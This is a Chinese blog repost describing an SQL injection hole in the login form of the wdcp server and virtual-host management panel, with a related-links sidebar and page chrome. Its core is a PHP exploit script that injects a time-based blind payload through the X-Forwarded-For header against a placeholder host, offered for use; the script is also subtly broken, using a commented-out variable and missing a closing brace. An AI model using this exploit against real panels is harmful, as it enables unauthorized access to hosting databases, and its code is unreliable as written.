wdcp虚拟主机管理系统注入漏洞

最新推荐文章于 2023-01-29 18:27:15 发布
最新推荐文章于 2023-01-29 18:27:15 发布
阅读量3.8k 收藏
点赞数
分类专栏: 注入 漏洞收集 虚拟主机 wdcp 文章标签: wdcp 虚拟主机 注入
日期:2014-05-13来源:伟大娃娃作者:人生注入点287 人围观

wdcp服务器/虚拟主机管理系统登陆框注入漏洞。

passwd字段存在注入风险,选择限制字符长度为30.我想应该有大牛能绕过!


 

下面给出由伟大娃娃发布的漏洞利用脚本


    <?php   
    $id=$_GET["id"];   
    //$id2=$_GET["id2"];   
    $post_data = 'username=admin&passwd=bbbbbb\&Submit_login=aaaassss';   
      $url='http://xxx:8080/';   
      $starttime = time();   
      $ch = curl_init();   
      curl_setopt($ch, CURLOPT_POST, 1);   
      curl_setopt($ch, CURLOPT_URL,$url);   
        //curl_setopt($ch, CURLOPT_TIMEOUT, 3);   
      curl_setopt($ch, CURLOPT_HTTPHEADER, array('X-FORWARDED-FOR: ,('.$id.'),char(65),1) #'));     
      curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);   
      ob_start();   
      curl_exec($ch);   
      $result = ob_get_contents() ;   
      ob_end_clean();   
      $endtime = time();   
    if($endtime-$starttime>=3){   
      exit($id." is ".chr($id2));   
    echo $result;   
    ?>  


7禧
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
php漏洞黑掉数据库,WDCP add_user.php任意数据库添加任意用户漏洞分析
weixin_39528289的博客
03-17 737
0x1. 什么是WDCPwdcp (WDlinux Control Panel)是一套用PHP开发的Linux服务器管理系统,旨在易于使用和管理Linux服务器,通过web后台就可以管理服务器和虚拟主机。和国外的cPanel类似。虚拟主机的小能手。2014年9月26,wdcp官网公布该漏洞,http://www.wdlinux.cn/bbs/thread-37476-1-1.html而且可以看到最...
wdcp管理系统:wdcp虚拟主机管理系统-开源
06-29
wdCP是WDlinux Control Panel的简称,是一套通过WEB控制和管理服务器的Linux服务器管理系统以及虚拟主机管理系统,旨在易于使用Linux系统做为我们的网站服务器系统,以及平时对Linux服务器的常用管理操作,均可在wdCP的...
渗透测试面试题
热门推荐
吃个榴莲压压鲸的博客
03-23 2万+
渗透篇 1、介绍一下自认为有趣的挖洞经历 挖洞也有分很多种类型,一种是以渗透、一种是以找漏洞为主,如果是前者会想各种办法获取权限继而获取想要的的东西完成渗透目标,这类跟HW类似,目标各种漏洞不算,要有Shell,服务器权限才给分,这才是最接近实战渗透,跟某部门有合作的话也是属于这种打击网络犯罪获得权限、传销数据、组织架构,服务器权限、等...... 2、你平时用的比较多的漏洞是哪些?相关漏洞的原理?以及对应漏洞的修复方案? SQL注入、密码组合,前者防护分为几种,CDN -> Web
WDCP v3版本的小工具集
不好好做安全的运维足球狗
07-20 302
2的小工具集不再适合于v3的使用 v3版本的小工具集已经可以使用,如下说明 小工具从v3.0.1版本开始提供 修改/重置后台用户的密码 /www/wdlinux/wdcp/shell/wdcploginchp.sh 适用于忘记了admin用户密码时可操作 恢复后台admin登录用户名 /www/wdlinux/wdcp/shell/wdcploginru.sh 修改/重置mysql...
利用SQL注入漏洞登录后台
weixin_33787529的博客
04-17 4423
2019独角兽企业重金招聘Python工程师标准>>> ...
wdcp的一个安全漏洞 2015 9 月
weixin_30251829的博客
12-09 158
wdcp的一个安全漏洞,非常严重,请大家及时升级和检查 在九月份的时候,wdcp出了一个很严重的安全漏洞,当时也出了补丁更新,具体可看http://www.wdlinux.cn/bbs/thread-37476-1-1.html但近日来,发现,很多wdcp的用户都被黑,被增加数据库用户,被上传文件,恶意发包攻击,流量异常,甚至是控制了SSH的权限等此次事件非常严重,影响...
常见的端口漏洞利用弱点
ovowovo的博客
12-12 642
21 ftp 主要看是否支持匿名,也可以跑弱口令 80 web 常见web漏洞以及是否为一些管理后台 443 openssl 心脏滴血以及一些web漏洞测试 873 rsync 主要看是否支持匿名,也可以跑弱口令 1900 bes默认管理后台 2082/2083 cpanel主机管理系统登陆 (国外用较多)? 2222 DA虚拟主机管理系统登陆 (国外用较多) 2601,2604 zebra路由,...
linux虚拟主机管理wdcp v1.1 build 20110423
11-02
wdcp (WDlinux Control Panel) 是一套用PHP开发的Linux服务器管理系统,旨在易于使用和管理Linux服务器,可以在线通过网页管理服务器和虚拟主机.简单,方便,易操作.只有Linux版本,没有windows版本,让你方便地使用和管理...
linux服务器管理系统wdcp v2.5.7
11-03
wdCP是WDlinux Control Panel的简称,是一套用PHP开发的Linux服务器管理系统以及虚拟主机管理系统,,旨在易于使用Linux系统做为我们的网站服务器,以及平时对Linux服务器的常用管理操作,均可在wdCP的后台里完成....
新版VPS主机管理面板WDCP安装及使用体验-国产简单易用型VPS面板
09-15
主要介绍了新版VPS主机管理面板WDCP安装及使用体验-国产简单易用型VPS面板,具有一定的参考价值,感兴趣的小伙伴们可以参考一下
星外-华众-新网-虚拟主机提权专用Webshell
08-23
支持星外、华众、N点、新网等虚拟主机提权,功能强大。
如何利用wdcp服务器管理系统.docx
09-27
如何利用wdcp服务器管理系统.docx
DeDecms远程写入漏洞webshell (dedecms漏洞)
aomiano55778的博客
02-19 2729
解释下Apache解析文件的流程: 当Apache检测到一个文件有多个扩展名时,如1.php.bak,会从右向左判断,直到有一个Apache认识的扩展名。如果所有的扩展名Apache都不认识,那么变会按照httpd.conf配置中所指定的方式展示这个问题,一般默认情况下是“text/plain”这种方式。 那么这样的话,像1.php.bak这样的文件名就会被当做php文件所解析。这也...
wdcp管理面板登录密码忘记的两种重置方法!
qq_26173001的博客
07-10 2424
http://www.tieww.com/2015/01/28/280.html
怎么在wdcp服务器配置网站,云服务器Linux型环境版网站管理助手(WDCP)使用方法
weixin_35456031的博客
08-12 907
云服务器环境版Linux型,我们安装的的是wdcp管理系统,是一套通过WEB控制和管理服务器的Linux服务器管理系统以及虚拟主机管理系统,旨在易于使用Linux系统做为我们的网站服务器系统,以及平时对Linux服务器的常用管理操作,均可在wdCP的后台里操作完成。使用wdCP,通过WEB方式就可以查看服务器情况,资源利用率,系统负载,内存使用率,带宽使用率等等。使用wdCP,通过WEB方式就可以...
wdcp面板php升级,WDCP面板升级补丁PHP版本Multipart/form-data漏洞方法
weixin_42404983的博客
03-20 487
在上月底被暴露出来的PHP基本上所有的版本都有PHP漏洞导致CPU占用100%的问题,我们要么升级到最新版本5.6.9版本PHP,要么直接在现有版本补丁包以及重新编译就可以解决问题。在这篇文章中,老蒋整理WDCP官方给予的解决PHP补丁当前已有PHP版本的问题。如果我们觉得升级当前版本比较麻烦,也可以根据"WDCP面板环境升级PHP5.6版本 附PHP最新漏洞补丁"文章升级到最新版本PHP,但是我...
备份数据 宝塔linux_宝塔面板被曝最新严重数据库安全漏洞,请及时更新 - WordPress教程...
weixin_33371495的博客
01-03 241
近期,广受欢迎的宝塔面板爆出严重的安全漏洞,使用该面板的站长注意了,赶紧升级到最新版本,避免被删库的风险。漏洞实现警告!!!宝塔爆出严重漏洞:7.4.2/7.5.14版本下只需访问*********即可绕过用户校验访问数据库。目前已经有多个网站数据库被删,请各位及时更新。官方信息【宝塔面板】紧急安全更新通知,Linux面板7.4.2版本/Windows面板6.8版本存在安全隐患,其他版本无此风险。...
项目五linux 内网完整渗透测试实例笔记
qq_56426046的博客
01-29 1710
本靶场存在三个 flag 把下载到的虚拟机环境导入到虚拟机,本靶场需要把网络环境配置好。在 wdcp 生成秘钥保存下来 在 kali 设置权限 600你知道什么叫幸福嘛?幸福就是拍拍手。
wdcp+定时运营php_阿里云PHP环境(主机宝--AMH--WDCP)操作说明及横向对比
weixin_39583655的博客
12-21 149
本人是做网站的,技术略懂,论坛中大神有很多,在下不敢班门弄斧,只因最近加入了一个阿里云的qq群,每天都有新人加入后咨询许多初级问题,特此写几篇关于web使用阿里云的教程和推荐给大家,我会尽量通俗的来写,让大家看得明白,希望对大家有一些帮助。本人撰写系列教程,从各层面帮助大家走上运营网站的道路:第一篇:阿里云PHP环境(主机宝--AMH--WDCP)操作说明及横向对比(Nginx + Apache[...
修改centos时间 wdcp
最新发布
08-22
要修改CentOS系统的时间,需要按照下列步骤进行操作: 1.登录到CentOS服务器,以超级用户(root)身份执行以下命令,以确认当前系统时间:date 2.停止时间同步,执行以下命令:service ntpd stop 3.设置新的系统时间,执行以下命令,其中YYYY代表年份,MM代表月份,DD代表日期,HH代表小时,MM代表分钟,SS代表秒钟,在命令中将YYYY-MM-DD HH:MM:SS替换为所需的时间:date -s "YYYY-MM-DD HH:MM:SS" 4.设置时区,执行以下命令,将时区替换为所需的时区(例如:Asia/Shanghai):cp /usr/share/zoneinfo/时区 /etc/localtime 5.启动时间同步服务,执行以下命令:service ntpd start 6.确认时间修改成功,重新执行以下命令来校验系统时间是否设定成功:date 7.若系统时间还是未能正确设定,可以尝试重启服务器,重新执行上述步骤。 以上是一般情况下修改CentOS时间的步骤,若使用了WDCP面板管理服务器,则可能会有额外的配置或管理界面操作。具体操作步骤可能因为WDCP的版本或设置而有所不同。建议查阅WDCP的官方文档或向WDCP的支持团队寻求帮助,以确保正确地修改CentOS时间。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值